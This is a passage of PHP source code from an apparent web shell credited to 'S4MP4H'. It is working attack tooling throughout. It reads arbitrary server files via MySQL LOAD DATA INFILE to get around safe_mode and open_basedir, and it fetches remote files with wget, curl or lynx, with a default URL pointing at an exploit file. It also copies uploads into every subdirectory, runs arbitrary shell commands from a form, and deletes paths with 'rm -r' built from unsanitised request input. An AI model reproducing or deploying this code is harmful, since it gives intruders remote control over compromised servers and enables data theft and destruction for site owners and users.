3699mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
3700mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
3701$result = mysql_query("SELECT * FROM tmp_file;");
3702if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
3703else {
3704for ($i=0;$i<mysql_num_fields($result);$i++) { $name = mysql_field_name($result,$i); }
3705$f = "";
3706while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $f .= join ("\r\n",$row); }
3707if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br/>";}
3708else {echo "<b>File \"".$sql_getfile."\":</b><br/>".nl2br(htmlspecialchars($f))."<br/>";}
3709mysql_free_result($result);
3710mysql_query("DROP TABLE tmp_file;");
3711}
3712}
3713mysql_drop_db($tmpdb);
3714}
3715}
3716}
3717}
3718echo '</td></tr>';
3719if ($sql_sock) {
3720$affected = @mysql_affected_rows($sql_sock);
3721if ((!is_numeric($affected)) or ($affected < 0)) { $affected = 0; }
3722echo "\t<tr><th colspan=2>Affected rows: $affected</th></tr>";
3723}
3724echo '</table>';
3725}
3726echo '</form>';
3727}
3728}
3729elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){
3730if(isset($_POST['uploadcomp'])){
3731if(is_uploaded_file($_FILES['file']['tmp_name'])){
3732$path = magicboom($_POST['path']);
3733$fname = $_FILES['file']['name'];
3734$tmp_name = $_FILES['file']['tmp_name'];
3735$pindah = $path.$fname;
3736$stat = @move_uploaded_file($tmp_name,$pindah);
3737$cp_filed = $_POST['cp_filed'];
3738if ($stat) {
3739if(isset($cp_filed)){
3740$dir_open = opendir('.');
3741while(false !== ($filename = readdir($dir_open))){
3742if($filename != "." && $filename != ".."){
3743if(is_dir($filename)){
3744$link = $filename;
3745copy($pindah, $path.$link."/".$fname);
3746}
3747}
3748}
3749closedir($dir_open);
3750}
3751$msg = "<br/>File Uploaded To <span class='gaya'>$pindah</span>";
3752}
3753else $msg = "<br/>Failed To Upload <span class='guyu'>$fname</span>";
3754}
3755else $msg = "<br/>Failed To Upload <span class='guyu'>$fname</span>";
3756}
3757elseif(isset($_POST['uploadurl'])){
3758$pilihan = trim($_POST['pilihan']);
3759$wurl = trim($_POST['wurl']);
3760$path = magicboom($_POST['path']);
3761$namafile = download($pilihan,$wurl);
3762$pindah = $path.$namafile;
3763if(is_file($pindah)) {
3764$msg = "<br/>File Uploaded To <span class='gaya'>$pindah</span>";
3765}
3766else $msg = "<br/>Failed To Upload <span class='guyu'>$namafile</span>";
3767}
3768?>
3769<form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
3770<table class="tabnet" style="width:325px;"><tr><th colspan="2">Upload From Computer</th></tr><tr><tr><td colspan="2" align="center"><input class="inputz" type="file" name="file" style="width:100%;" /></td></tr><tr><td><input type="checkbox" name="cp_filed" /> Copy To All Sub Directories</td><td><input type="submit" name="uploadcomp" class="inputzbut" value="Go !" style="width:80px;"></td></tr><tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr></tr></table></form><table class="tabnet" style="width:32px;"><tr><th colspan="2">Upload From Url</th></tr><tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload"><table><tr><td>URL</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr><tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr><tr><td><select size="1" class="inputz" name="pilihan"><option value="wwget">wget</option><option value="wlynx">lynx</option><option value="wfread">fread</option><option value="wfetch">fetch</option><option value="wlinks">links</option><option value="wget">GET</option><option value="wcurl">curl</option></select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go !" style="width:246px;"></td></tr></form></table></td></tr></table><div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
3771<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?>
3772<form action="?y=<?php echo $pwd; ?>&x=shell" method="post"><br/><table class="cmdbox"><tr><td colspan="2"><textarea class="output" readonly>
3773<?php
3774if(isset($_POST['submitcmd'])){
3775echo @exe($_POST['cmd']);
3776}
3777?>
3778</textarea><tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr></table></form>
3779<?php }
3780else {
3781if(isset($_GET['delete']) && ($_GET['delete'] != "")){
3782$file = $_GET['delete'];
3783@unlink($file);
3784}
3785elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
3786if (@exe("ls -a ".$_GET['fdelete']))
3787{
3788@exe("rm -r ".$_GET['fdelete']);
3789}
3790else
3791$dir = $_GET['fdelete'];
3792delTree($dir);
3793}
3794elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
3795$path = $pwd.$_GET['mkdir'];
3796@mkdir($path);
3797}
3798$buff = showdir($pwd,$prompt);
3799echo $buff;
3800}
3801?>
3802<script language='javascript'>
3803function checkAll(bx){
3804var cbs = document.getElementsByTagName('input');
3805for(var i=0; i < cbs.length; i++){
3806if(cbs[i].type == 'checkbox' && cbs[i].name != 'dis'){
3807cbs[i].checked = bx.checked;
3808var c = cbs[i].parentElement.parentElement;
3809if(cbs[i].checked) c.className = 'cbox_selected';
3810else c.className = '';
3811}
3812}
3813}
3814function hilite(el){
3815var c = el.parentElement.parentElement;
3816if(el.checked) c.className = 'cbox_selected';
3817else c.className = '';
3818}
3819function optionCheck(){
3820var option = document.getElementById("options").value;
3821if(option == "pl"){
3822document.getElementById("wow").value = "shell.pl";
3823}
3824if(option == "py"){
3825document.getElementById("wow").value = "shell.py";
3826}
3827if(option == "asp"){
3828document.getElementById("wow").value = "shell.asp";
3829}
3830if(option == "aspx"){
3831document.getElementById("wow").value = "shell.aspx";
3832}
3833if(option == "jsp"){
3834document.getElementById("wow").value = "shell.jsp";
3835}
3836}
3837setInterval(ganti, 100);
3838function ganti(){
3839var isi = document.getElementById("portname").value;
3840var wew = document.getElementById("aisi");
3841wew.innerHTML = "http://<?php echo $server_ip; ?>:"+isi;
3842wew.href = "http://<?php echo $server_ip; ?>:"+isi;
3843}
3844function ubah(){
3845var sebelum = document.getElementById("upfile").value;
3846var sesudah = document.getElementById("namefile");
3847sesudah.value = sebelum.split(/[\\/]/).pop();;
3848}
3849</script>
3850<?php
3851echo $jsc;
3852?>
3853<center>
3854<div id="spoiler" style="display:none;">
3855<form action="?y=<?php echo $pwd; ?>" enctype="multipart/form-data" method="post"><table class="tabnet" style="width:325px;"><tr><th colspan="2">Upload From Computer</th></tr><tr><tr><td colspan="2" align="center"><input class="inputz" type="file" name="file" id="upfile" style="width:100%;" onchange="ubah()" /></td></tr><tr><td width="70px"> New Name : </td><td><input class="inputz" type="text" name="namefile" id="namefile" style="width:100%;" /></td></tr><tr><td colspan="2"><input type="checkbox" name="cp_files" /> Copy To All Sub Directories <span style="float:right;"><input type="submit" name="uploadcomps" class="inputzbut" value="Go !" style="width:80px;"></span></td></tr><tr><td colspan="2"><input type="text" class="inputz" style="width:100%;" name="path" value="<?php echo $pwd; ?>" /></td></tr></tr></table></form>
3856<?php
3857if(isset($_POST['uploadcomps'])){
3858if(is_uploaded_file($_FILES['file']['tmp_name'])){
3859$path = magicboom($_POST['path']);
3860$fname = $_FILES['file']['name'];
3861$tmp_name = $_FILES['file']['tmp_name'];
3862$newfname = $_POST['namefile'];
3863$pindah = $path.$newfname;
3864$stat = @move_uploaded_file($tmp_name,$pindah);
3865$cp_files = $_POST['cp_files'];
3866if ($stat) {
3867if(isset($cp_files)){
3868$dir_open = opendir('.');
3869while(false !== ($filename = readdir($dir_open))){
3870if($filename != "." && $filename != ".."){
3871if(is_dir($filename)){
3872$link = $filename;
3873copy($pindah, $path.$link."/".$fname);
3874}
3875}
3876}
3877closedir($dir_open);
3878}
3879echo "<script language='javascript'>
3880alert('File Uploaded To $pindah');
3881window.location.href = '?y=$pwd';
3882</script>";
3883}
3884else {
3885echo "<script language='javascript'>
3886alert('Failed To Upload $fname');
3887window.location.href = '?y=$pwd';
3888</script>";
3889}
3890}
3891else {
3892echo "<script language='javascript'>
3893alert('Failed To Upload $fname');
3894window.location.href = '?y=$pwd';
3895</script>";
3896}
3897}
3898?>
3899</div>
3900<br/>
3901<div class="footer"><div class="info">[ Shell By <a href="http://www.alanz.co.de/search/?q=Hacked+By+S4MP4H" target="_blank"><span class="gaya"><? echo $xName; ?></span></a> ]</div><div class="jaya">Allright Reserved © <?php echo date("Y",time())." ".$xName; ?></div></div></center></script></div></body></html><?